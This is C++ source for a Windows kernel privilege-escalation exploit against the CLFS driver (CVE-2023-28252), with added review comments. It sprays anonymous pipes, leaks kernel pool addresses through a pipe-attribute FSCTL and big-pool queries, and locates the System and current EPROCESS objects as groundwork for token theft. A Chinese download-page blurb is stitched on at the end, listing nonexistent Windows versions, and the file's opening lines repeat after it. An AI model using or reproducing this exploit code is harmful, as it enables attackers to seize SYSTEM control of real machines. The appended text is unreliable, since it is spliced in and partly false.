#include "clfs_eop.h"
// Global Variables
// Shared state for the functions in this translation unit.  Nothing here is
// `static`, so every name has external linkage.  Three names used below
// (fnNtQuerySystemInformation, g_EProcessAddress, g_EThreadAddress) are not
// declared in this span — presumably they come from clfs_eop.h; confirm.
IO_STATUS_BLOCK status_block = { 0 }; // filled in by the NtFsControlFile call in getVirtualAddress()
// offset_* / fn* / user_* triples.  From the naming only (none of these are
// assigned within this span): offset_* look like image-relative offsets,
// fn* like kernel-mode addresses and user_* like the same exports resolved
// in a user-mode mapping.  NOTE(review): treat as an assumption to verify
// against the code that populates them.
UINT64 offset_SeSetAccess = 0;
UINT64 offset_RtlClearBit = 0;
UINT64 offset_PoFxProcessorNotification=0;
UINT64 offset_SeSetAccessStateGenericMapping = 0;
UINT64 offset_FsRtlCurrentBatchOplock = 0;
func3* _NtFsControlFile; // resolved from ntdll in getVirtualAddress(); func3 is presumably declared in clfs_eop.h
UINT64 fnSeSetAccessStateGenericMapping = 0;
UINT64 fnPoFxProcessorNotification = 0;
UINT64 offset_ClfsEarlier = 0;
UINT64 offset_ClfsMgmtDeregisterManagedClient = 0;
UINT64 fnClfsEarlierLsn = 0;
UINT64 fnClfsMgmtDeregisterManagedClient = 0;
UINT64 fnRtlClearBit = 0;
UINT64 fnFsRtlCurrentBatchOplock = 0;
UINT64 para_PipeAttributeobjInkernel = 0; // kernel VirtualAddress of the first 'NpAt'-tagged big-pool entry found by getVirtualAddress()
CHAR clfs_path[] = { "\\SystemRoot\\System32\\drivers\\CLFS.SYS" }; // NT-native path of the CLFS driver image
FARPROC user_ClfsEarlierLsn = NULL;
FARPROC user_ClfsMgmtDeregisterManagedClient = NULL;
FARPROC user_RtlClearBit = NULL;
FARPROC user_SeSetAccessStateGenericMapping = NULL;
FARPROC user_PoFxProcessorNotification = NULL;
// NOTE: integer globals initialised with NULL (a pointer constant); compiles
// under MSVC but `= 0` would be the conventional form.
UINT64 ntos_kernelBase = NULL;
UINT64 clfs_kernelBase = NULL;
WCHAR* stored_env_xfname = { 0 };
WCHAR* stored_env_containerfname = { 0 };
WCHAR* stored_env_filename = { 0 };
VOID* temp_chunk = 0; // 0x2000-byte heap buffer used as the FSCTL input in getVirtualAddress()
HANDLE logFile = INVALID_HANDLE_VALUE;
HANDLE logFile2 = INVALID_HANDLE_VALUE;
HANDLE filehandle = INVALID_HANDLE_VALUE;
HANDLE hPipeRead = 0 ; // both ends of the anonymous pipe created in getVirtualAddress()
HANDLE hPipeWrite = 0;
UINT64 System_token_value = 0;
UINT64 System_token_value2 = 0;
size_t numread; // uninitialised at file scope is fine (static storage is zeroed), but note nothing in this span assigns it
#define NUMELEM 0x7a00
#define NUMELEM2 0x400
// Scratch buffers.  The sizes repeat the NUMELEM/NUMELEM2 literals instead of
// using the macros, so the two can silently drift apart if one is edited.
char buff[0x7a00];
char buff2[0x400];
char buff1[0x400];
char buff3[0x7a00];
char buff4[0x10000];
INT64 consec_number = 0;
INT64 distance = 0;
INT64 prev_pointer = 0;
INT64 temp_pointer = 0;
INT64 temp_distance = 0;
INT64 final_distance = 0;
UINT num_of_CLFS = 0;
PUINT p_num_of_CLFS = &num_of_CLFS; // number of CLFS tags
CHAR tag[] = { "Clfs" }; // pool tag string compared against big-pool entries elsewhere in the file (not in this span)
PUINT64 p_possible_kernelAddrArray = 0; // Offset of last field virtual address
DWORD* temp_alloc_2 = 0; // 0x1000-byte VirtualAlloc'd probe buffer for the first SystemBigPoolInformation query
unsigned int amount_of_CLFS_pools = 0; // stores the amount of bigpool clfs tags
WCHAR* stored_name_CreateLog;
DWORD _pid = 0;
DWORD pid_to_find = 0;
int token_offset = 0;
LONGLONG token_value = 0;
WCHAR* stored_name_fopen;
WCHAR* foldr = nullptr; // `nullptr` here means this unit is compiled as C++ (see also __try/__except below)
DWORDLONG system_EPROCESS = 0; // kernel address of the System process object, set in InitEnvironment()
DWORDLONG system_EPROCESS_low = 0;
DWORDLONG system_EPROCESS_high = 0;
PUINT64 kernelAddrArray = 0;
HANDLE hProcess = NULL; // duplicated current-process / current-thread handles, set in InitEnvironment()
HANDLE hThread = NULL;
HANDLE hToken = NULL;
HMODULE user32 = NULL;
int flag = 0;
int flag2 = 0;
UINT64 dest2 = 0;
UINT64 dest3 = 0;
UINT64 value2 = 0;
UINT64* value3 = 0;
UINT64 next_token;
HMODULE ntbase = 0; // ntdll.dll module handle from LoadLibraryA in getVirtualAddress()
UINT PIPE_ATTR_TAG = 0x7441704E; // NpAt — little-endian bytes 'N','p','A','t'; compared with AllocatedInfo[i].TagUlong
ULONG retlen2 = 0; // byte count returned by NtQuerySystemInformation(SystemBigPoolInformation)
int random_part = 0;
int random_part2 = 0;
UINT64 CLFS_kernelAddrArray = 0;
HANDLE hlogfile = INVALID_HANDLE_VALUE;
FILE* pfile = 0;
FILE* pfile2 = 0;
WCHAR* stored_env_log = { 0 };
WCHAR* stored_env = { 0 };
WCHAR* stored_env_spray = { 0 };
WCHAR* stored_env_spray_log;
WCHAR* stored_log_arrays[10] = { 0 };
WCHAR* stored_container_arrays[10] = { 0 };
WCHAR* stored_fopen_arrays[10] = { 0 };
WCHAR* tmp_env8 = { 0 };
VOID * buffer_0x1a0 = { 0 };
UINT64 * handles_buffer1 = { 0 };
UINT64* handles_buffer2 = { 0 };
VOID* dest; // 0x100-byte heap buffer used as the FSCTL output buffer in getVirtualAddress()
unsigned int pos_token = 0;
// Creates `value` anonymous pipes and stores each (read, write) handle pair in
// consecutive slots of temp_buffer, so the caller must provide at least
// 2 * value entries.  Each pipe is created with a 0x25c0-byte size hint.
// If any CreatePipe call fails, every pair created so far is closed and the
// process exits with status 1.  Otherwise the number of pipes created is
// printed.  A value <= 0 creates nothing and prints 0.
void fun_pipeSpray(int value, UINT64* temp_buffer) {
    int created = 0;
    for (int slot = 0; created < value; slot += 2) {
        if (CreatePipe((PHANDLE)&temp_buffer[slot], (PHANDLE)&temp_buffer[slot + 1], 0, 0x25c0)) {
            ++created;
            continue;
        }
        // Unwind: close the pairs that did succeed, walking from the front.
        UINT64* pair = temp_buffer;
        while (created > 0) {
            CloseHandle((HANDLE)pair[0]);
            CloseHandle((HANDLE)pair[1]);
            pair += 2;
            --created;
        }
        exit(1);
    }
    printf("\nnumber of pipes created =%x\n", created);
}
// Obtains a kernel pool address via the named-pipe attribute allocation.
// What the code below does, in order:
//   1. loads ntdll and resolves NtQuerySystemInformation and NtFsControlFile;
//   2. creates an anonymous pipe and issues one FSCTL (code 0x11003c) to its
//      write end with a 0xfd8-byte input buffer and a 0x100-byte output buffer;
//   3. queries SystemBigPoolInformation (twice: once to size, once to read)
//      and stores the VirtualAddress of the first entry tagged 'NpAt' in
//      para_PipeAttributeobjInkernel.
// Presumably step 2 is what creates the tagged allocation that step 3 looks
// for — the FSCTL precedes the pool snapshot for that reason; confirm.
// Side effects: assigns ntbase, fnNtQuerySystemInformation, _NtFsControlFile,
// hPipeRead/hPipeWrite, temp_chunk, dest, temp_alloc_2, retlen2 and
// para_PipeAttributeobjInkernel; calls exit() on most failures.  The heap and
// VirtualAlloc buffers are never released here.
// NOTE(review): SystemBigPoolInformation exposes kernel pool addresses to the
// caller; reads of that information class from a low-privilege process are a
// reasonable thing for a defender to log.
void getVirtualAddress() {
ntbase = LoadLibraryA("ntdll.dll");
if (!ntbase) {
printf("[!] LoadLibrary failed with error %x\n", (unsigned int)GetLastError());
exit(1);
}
// fnNtQuerySystemInformation and the _NtQuerySystemInformation type are not
// declared in this span (presumably clfs_eop.h); only NtFsControlFile is
// NULL-checked.
fnNtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(ntbase, "NtQuerySystemInformation");
_NtFsControlFile = (func3*)GetProcAddress(ntbase, "NtFsControlFile");
if (!_NtFsControlFile) exit(1);
printf("\nVIRTUAL ADDRESSES AND OFFSETS\n");
printf("[+] NtFsControlFile Address --> %p\n", _NtFsControlFile);
if (!CreatePipe(&hPipeRead, &hPipeWrite, 0, 0x1000))
{
exit(0);
}
// FSCTL input: 0x2000 bytes, first 8 bytes = 0x5a, the following 0xffe bytes
// = 0x41 (the cast to UINT64* makes "+ 1" an 8-byte step).  Only 0xfd8 bytes
// of it are passed to the FSCTL below.
temp_chunk = malloc(0x2000);
if (temp_chunk == 0) { exit(0); }
memset((UINT64*)temp_chunk + 1, 0x41, 0xffe);
*(UINT64*)temp_chunk = 0x5a; // "Z"
// FSCTL output buffer: 0x100 bytes, 0xff of them set to 0x42.
dest = malloc(0x100);
if (dest == 0) { exit(0); }
memset(dest, 0x42, 0xff);
// 0x1000 = MEM_COMMIT, 4 = PAGE_READWRITE.  NOTE(review): the result is not
// checked before being handed to the query below.
temp_alloc_2 = (DWORD*)VirtualAlloc(0, 0x1000, 0x1000, 4);
// 0x11003c appears to be FSCTL_PIPE_SET_HANDLE_ATTRIBUTE — confirm against the
// pipe FSCTL definitions; the status goes to the global status_block and is
// not examined.
_NtFsControlFile(hPipeWrite, 0, 0, 0, &status_block, 0x11003c, temp_chunk, 0xfd8, dest, 0x100);
// Sizing call: the 0x1000-byte probe is expected to be too small; its return
// value is ignored and retlen2 receives the required length.
fnNtQuerySystemInformation(SystemBigPoolInformation, temp_alloc_2, 0x1000, &retlen2);
// NOTE(review): v5a is not NULL-checked here; the pBuf == 0 test below runs
// only after the query has already been issued with it.
DWORD* v5a = (DWORD*)VirtualAlloc(0, (SIZE_T)retlen2, 0x1000, 4);
NTSTATUS status = STATUS_SUCCESS;
if (NT_SUCCESS(status = fnNtQuerySystemInformation(SystemBigPoolInformation, v5a, retlen2, &retlen2))) {
PSYSTEM_BIGPOOL_INFORMATION pBuf = (PSYSTEM_BIGPOOL_INFORMATION)(v5a);
if (pBuf == 0) { exit(0); }
// Linear scan for the first big-pool entry whose tag is 'NpAt'; stops at the
// first hit.  i < Count already bounds the loop, so the MSVC structured
// exception handler below only covers an unexpected fault inside the body.
for (ULONG i = 0; i < pBuf->Count; i++) {
__try {
if (pBuf->AllocatedInfo[i].TagUlong == PIPE_ATTR_TAG) {
printf("[+] pool NpAt VirtualAddress -->%p\n", pBuf->AllocatedInfo[i].VirtualAddress);
para_PipeAttributeobjInkernel = (UINT64)pBuf->AllocatedInfo[i].VirtualAddress;
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
printf("(%s) Access Violation was raised.", __FUNCTION__);
}
}
}
return;
}
// Returns the kernel address of the object behind handle `Object` by walking
// the system-wide extended handle table (SystemExtendedHandleInformation).
// The entry must match on both process id and handle value:
//   - Object == 4 is treated specially as "handle 4 inside PID 4" (the
//     System process), which is how InitEnvironment() asks for the System
//     EPROCESS;
//   - any other value is looked up under the current process id.
// Returns the entry's Object field on a match.  There is no "not found"
// result: see the loop note at the bottom.  Requires fnNtQuerySystemInformation
// to have been resolved first (getVirtualAddress()).
SIZE_T GetObjectKernelAddress(HANDLE Object)
{
PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
ULONG handleInfoSize = 0x1000;
ULONG retLength;
NTSTATUS status;
SIZE_T kernelAddress = 0;
BOOL bFind = FALSE;
while (TRUE)
{
// Probe with a 0x1000-byte buffer mainly to learn the required size.
// NOTE(review): the LocalAlloc result is passed straight to the query; the
// NULL check further down applies only to the second allocation.
handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize);
status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength);
if (status == 0xC0000004 || NT_SUCCESS(status)) // STATUS_INFO_LENGTH_MISMATCH
{
// Re-query with retLength + 0x100 bytes.  Because NT_SUCCESS also enters
// this branch, the table is fetched twice even when the probe sufficed.
LocalFree(handleInfo);
handleInfoSize = retLength + 0x100;
handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize);
status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength);
if (!handleInfo) {
printf("[!] cannot read handle info %x\n", (unsigned int)GetLastError());
exit(1);
}
ULONG numHandles = (ULONG)handleInfo->NumberOfHandles;
if (!numHandles) {
printf("[!] cannot read number of handles %x\n", (unsigned int)GetLastError());
exit(1);
}
if (NT_SUCCESS(status))
{
for (ULONG i = 0; i < numHandles; i++)
{
if ((DWORD64)Object == 0x4)
{
// Special case: handle value 4 owned by PID 4.
if (0x4 == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue)
{
kernelAddress = (SIZE_T)handleInfo->Handles[i].Object;
bFind = TRUE;
break;
}
}
else
{
// Normal case: the handle must belong to this process.
if (GetCurrentProcessId() == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue)
{
kernelAddress = (SIZE_T)handleInfo->Handles[i].Object;
bFind = TRUE;
break;
}
}
}
}
}
if (handleInfo)
LocalFree(handleInfo);
// NOTE(review): the only exit from the while(TRUE) loop is a successful
// match.  If the handle is never present in the table, or the query keeps
// returning a status other than STATUS_INFO_LENGTH_MISMATCH / success, this
// re-queries forever with no retry limit.
if (bFind)
break;
}
return kernelAddress;
}
VOID InitEnvironment()
{
DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(), &hProcess, 0, FALSE, DUPLICATE_SAME_ACCESS);
g_EProcessAddress = GetObjectKernelAddress(hProcess);
printf("[+] MY EPROCESSS %p\n", (void*)g_EProcessAddress);
system_EPROCESS = GetObjectKernelAddress((HANDLE)4);
printf("[+] SYSTEM EPROCESSS %p\n", (void*)system_EPROCESS);
DuplicateHandle(GetCurrentProcess(), GetCurrentThread(), GetCurrentProcess(), &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS);
g_EThreadAddress = GetObjectKernelAddress(hThread);
printf("[+] _ETHREAD ADDRESS %p\n", (void*)g_EThreadAddress);
温馨提示
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞。 卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———Windows中最高的用户权限级别。该漏洞允许改变基础日志文件,迫使系统将基础日志文件中的假元素视为真实元素。其通过改变指向内存中一个特定的公共日志文件系统(CLFS)结构的偏移值,使之指向一个恶意结构。此外其在用户层面提供一个指向受控内存的指针,以获得内核的读/写权限。CLFS结构是Windows操作系统使用的CLFS通用日志系统的一部分,它由物理日志文件、日志流、日志记录等组成。 受影响版本 Windows7/8/9/10/11 Windows Server 2008/2012/2016/2018/2019/2022 #include "clfs_eop.h" // Global Variables IO_STATUS_BLOCK status_block = { 0 }; UINT64 offset_SeSetAccess = 0;